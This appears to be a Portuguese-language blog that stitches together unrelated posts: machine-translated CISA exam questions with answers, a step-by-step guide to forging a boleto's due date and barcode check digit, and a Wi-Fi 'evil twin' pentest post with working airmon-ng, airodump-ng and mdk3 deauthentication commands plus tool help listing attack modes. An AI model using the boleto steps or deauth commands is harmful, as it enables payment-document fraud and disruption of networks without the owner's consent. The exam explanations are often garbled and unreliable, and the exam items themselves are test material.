CERTIFICAÇÃO CISA - CISSP

Grande esforço! Não importa a sua pontuação, a preparação correta da ISACA ®  irá ajudá-lo a se destacar em seu CISA ®  exame e mover sua carreira para a frente.

Desloque-se para os seus resultados detalhados.

Lembre-se: estas perguntas são uma pequena prévia do que você pode esperar no dia do exame.

O exame oficial CISA tem 150 perguntas.

Você está a poucos passos de distância da obtenção de sua certificação CISA:

1. Prep para o exame.

2. registrar e pagar para o seu exame.

3. Programe o seu exame.

4. Ace no exame CISA.

1

Um regulamento de auditoria deve:

A sua resposta: D. delinear a autoridade geral, o escopo e as responsabilidades da função de auditoria.

EXPLICAÇÃO : Uma Carta de Auditoria deve indicar objetivos da administração para e delegação de autoridade para Contas.

2

Um auditor de SI encontra um pequeno número de pedidos de acesso do usuário que não tinham sido autorizadas pelos gestores através das etapas de fluxo de trabalho predefinidos normais e regras de escalonamento. O auditor de SI deve:

CORRETO RESPOSTA: A. realizar uma análise adicional.

EXPLICAÇÃO : O auditor de SI deve primeiro determinar a causa raiz e impacto dos resultados e não tem informações suficientes para recomendar que fixa os problemas de fluxo de trabalho.

3

Um auditor de SI observa que uma empresa terceirizou desenvolvimento de software para um terceiro que é uma empresa startup. Para garantir que o investimento da empresa em software é protegido, qual dos seguintes deve ser recomendado pelo auditor de SI?

CORRETO RESPOSTA: C. Deve haver um acordo de depósito código fonte no lugar.

EXPLICAÇÃO : Enquanto uma auditoria trimestral das instalações de fornecedores é uma boa prática, não garantir a disponibilidade do código-fonte em caso de falha do fornecedor start-up.

4

O apetite de risco de uma empresa é  melhor estabelecida por:

CORRETO RESPOSTA: D. comité de direcção.

EXPLICAÇÃO : A equipa de gestão de segurança está preocupado com a gestão da postura de segurança, mas não com a determinação da postura.

5

Ao identificar um tempo de conclusão do projeto anterior, que deve ser obtido mediante o pagamento de um prémio para a conclusão inicial, as atividades que devem ser selecionados são aqueles:

CORRETO RESPOSTA: B. que ter zero tempo de folga.

EXPLICAÇÃO : O caminho crítico é o tempo de duração mais longa das actividades, mas não se baseia no tempo mais longo de qualquer actividade individual.

6

Um auditor de SI é atribuído a auditar um projeto de desenvolvimento de software, que é mais de 80 por cento concluída, mas já invadida tempo em 10 por cento e os custos em 25 por cento. Qual das seguintes ações deve o auditor tomar?

CORRETO RESPOSTA: D. Reveja a condução do projeto e o business case.

EXPLICAÇÃO : Não há nenhuma indicação de que o gerente de projeto deve ser alterado sem olhar para as razões para a superação.

7

Um programador modificado maliciosamente um programa de produção para alterar os dados e, em seguida, restaurado o código original. Qual dos seguintes iria  MAIS  efetivamente detectar a atividade maliciosa?

CORRETO RESPOSTA: B. Revendo arquivos de log do sistema

EXPLICAÇÃO : Revendo a integridade do código executável e fonte é um controle ineficaz, porque o código fonte foi alterado novamente para o original e vai concordar com o executável atual.

8

Qual dos seguintes seria  melhor  assegurar a continuidade de uma rede de área ampla (WAN) em toda a organização?

A sua resposta: A. Built-in de roteamento alternativo

EXPLICAÇÃO : encaminhamento alternativo seria garantir que a rede continuaria se um dispositivo de comunicação falhar ou se uma ligação é cortada por causa mensagem de reencaminhamento pode ser automática.

9

Um auditor de SI está revendo os controles de um centro de dados de segurança física e percebe várias áreas de preocupação. Qual das seguintes áreas é o  MAIS importante?

CORRETO RESPOSTA: D. A porta de saída de emergência está bloqueado.

EXPLICAÇÃO : O desligamento de emergência questão botão é uma preocupação significativa, mas a segurança de vida é a maior prioridade.

10

Qual das seguintes opções  MELHORES  ajuda os proprietários de informação para classificar corretamente os dados?

SUA RESPOSTA: B. Treinamento em políticas e padrões organizacionais

EXPLICAÇÃO: Ao implementar a classificação de dados, é essencial que as políticas e os padrões organizacionais, incluindo o esquema de classificação de dados, sejam entendidos pelo proprietário ou guardião dos dados para que possam ser classificados adequadamente.

COMO ALTERAR VENCIMENTO DE BOLETO MANUALMENTE

Por Thiago Alvarenga

ALTERANDO O VENCIMENTO DE UM BOLETO 

Este artigo tem como objetivo, o de demonstrar um passo a passo para alterar o vencimento de um boleto comum.

É sábio dizer que cada campo de um boleto tem um significado, não cabe este artigo explicá-lo, mas você poderá verificar nos links que serão adicionados ao final deste artigo.


Veja a imagem abaixo:

Observe que os números em vermelho determina o vencimento do boleto, porém, é feito um cálculo matemático sobre este campo. A parte azul identifica o valor do boleto.

Vamos praticar:

PASSO UM:

1 - Copie o código de barras e cole ele no seguinte site: teste boletos

2 - Visite o site acima e altere os campos da data de vencimento acrescentando números adiante ao que está no seu boleto, copie o código de barras e clique no botão para calcular, ele vai dar um erro apontando qual código é o verificador, desta forma basta você alterar e pronto, você tem um código de barras com uma data atual.

Desta forma, basta pegar o boleto original, jogar em um site para converter de pdf para doc do word e colar o novo código de barras e seus respectivos campos, ao concluir, salve o documento em formato de pdf.


Fato que o emissor do boleto receberá este boleto em sua conta, basta saber se ele irá consentir este crédito para o fim que se destina, isto terá que ser acordado previamente.

Fonte:

https://www.google.com/search?q=bacem+c%C3%B3digo+vencimento+boleto&rlz=1C1CHBD_pt-PTBR828BR829&oq=bacem+c%C3%B3digo+vencimento+boleto&aqs=chrome..69i57.9216j0j4&sourceid=chrome&ie=UTF-8

http://www.contadordedias.com.br/

https://gerencianet.com.br/blog/campos-dos-boletos-linha-digitavel/

http://www.socialbits.com.br/software/excel-dicas-praticas-08-verificando-linha-do-codigo-de-barras/

Quebra de Wifi - Aireplay VS MDK3

QUEBRA DE WIFI USANDO O EVIL TIWN ATTACK (LINSET)

Este post descreve uma forma simples em usar métodos auxiliares de um Pentest Wifi, isto ao que tange o uso do Linset ou outra aplicação do gênero. Este poste não visa ensinar a usá-lo, restringe-se apenas em demonstrar uma forma auxiliar para manter os clientes do AP (access point - roteador), desconectado. Também não será explanado nenhum comparativo entre o Aireplay ou MDK3. Vale ressaltar que já existe outros métodos de penetração mais eficiente, mas este ainda é adotado pela sua facilidade e por usar as mesmas técnicas do Pineapple Wifi (Alan Turing).

Para este LAB:

• Workstation VM
• Wifislax
• Dois adaptadores Wifi.

SITUAÇÃO:

Em determinado Pentest, foi detectado uma ineficiência no Aireplay e o MDK3, então foi iniciado outra instância na VM rodando o Wifislax, desta vez para verificar se havia dispositivos conectados no Roteador. 

Com duas instâncias VMs rodando o Wifislax (sistema operacional usado para quebra de wifi), use os seguintes comandos:

PRIMEIRO COMANDO:

1 - Digite: airmon-ng start wlan0

Este comando habilita o modo monitor e cria uma interface comumente denomindada de mon0 você verá a seguinte saída:

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy14]

                                (monitor mode enabled on mon0)

Esta saída representa que o seu adaptador usb wifi está em modo monitor, instalado e pronto para uso.

SEGUNDO COMANDO:

Digite este comando: airodump-ng mon0

Este comando é usado como sniff de rede wifi, necessário para conseguir o MAC, o canal e saber se há clientes conectados na rede wifi.

TERCEIRO COMANDO:

Digite este comando: airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel AA --write AABBZZ mon0

X : é o mac do roteador usado para o pentest

AA: é o canal do respectivo roteador.

AABBZZ: é o nome do arquivo de captura, pode ser visualizado pelo wireshark.

Diante dessas informações, é possível usar Aireplay ou MDK3 para forçar a queda dos clientes ativos no roteador sem fio.

Help Aireplay:

Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe

  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point

      -d dmac   : MAC address, Destination

      -s smac   : MAC address, Source

      -m len    : minimum packet length

      -n len    : maximum packet length

      -u type   : frame control, type    field

      -v subt   : frame control, subtype field

      -t tods   : frame control, To      DS bit

      -f fromds : frame control, From    DS bit

      -w iswep  : frame control, WEP     bit

      -D        : disable AP detection

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)

      --fakeauth    delay : fake authentication with AP (-1)

      --interactive       : interactive frame selection (-2)

      --arpreplay         : standard ARP-request replay (-3)

      --chopchop          : decrypt/chopchop WEP packet (-4)

      --fragment          : generates valid keystream   (-5)

      --caffe-latte       : query a client for new IVs  (-6)

      --cfrag             : fragments against a client  (-7)

      --migmode           : attacks WPA migration mode  (-8)

      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen

Além do Aireplay, é possível utilizar o MDK3, particularmente, tenho preferência nele.

MDK3

Considerando a forma sucinta, utilizou-se para o fim que se destina este post o comando abaixo:

mdk3 mon0 d -i XX:XX:XX:XX:XX

Onde o xx é o MAC do roteador em questão.

Após digitar o comando, a sua saída estará da seguinte forma:

Disconnecting between: AA:AA:AA:AA:AA:AA and: AA:AA:AA:AA:AA:AA

Onde o xx é o MAC dos clientes (celulares e dispositivos sem fio conectados ao roteador) em questão.

É possível consulta o seu help logo abaixo:

MDK 3.0 v6 - "Yeah, well, whatever"

by ASPj of k2wrlz, using the osdep library from aircrack-ng

And with lots of help from the great aircrack-ng community:

Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,

telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik

THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.

IMPORTANT: It is your responsibility to make sure you have permission from the

network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:

mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options

Try mdk3 --help <test_mode> for info about one test only

TEST MODES:

b   - Beacon Flood Mode

      Sends beacon frames to show fake APs at clients.

      This can sometimes crash network scanners and even drivers!

a   - Authentication DoS mode

      Sends authentication frames to all APs found in range.

      Too much clients freeze or reset some APs.

p   - Basic probing and ESSID Bruteforce mode

      Probes AP and check for answer, useful for checking if SSID has

      been correctly decloaked or if AP is in your adaptors sending range

      SSID Bruteforcing is also possible with this test mode.

d   - Deauthentication / Disassociation Amok Mode

      Kicks everybody found from AP

m   - Michael shutdown exploitation (TKIP)

      Cancels all traffic continuously

x   - 802.1X tests

w   - WIDS/WIPS Confusion

      Confuse/Abuse Intrusion Detection and Prevention Systems

f   - MAC filter bruteforce mode

      This test uses a list of known client MAC Adresses and tries to

      authenticate them to the given AP while dynamically changing

      its response timeout for best performance. It currently works only

      on APs who deny an open authentication request properly

g   - WPA Downgrade test

      deauthenticates Stations and APs sending WPA encrypted packets.

      With this test you can check if the sysadmin will try setting his

      network to WEP or disable encryption.

Por fim, atingimos a finalidade deste post.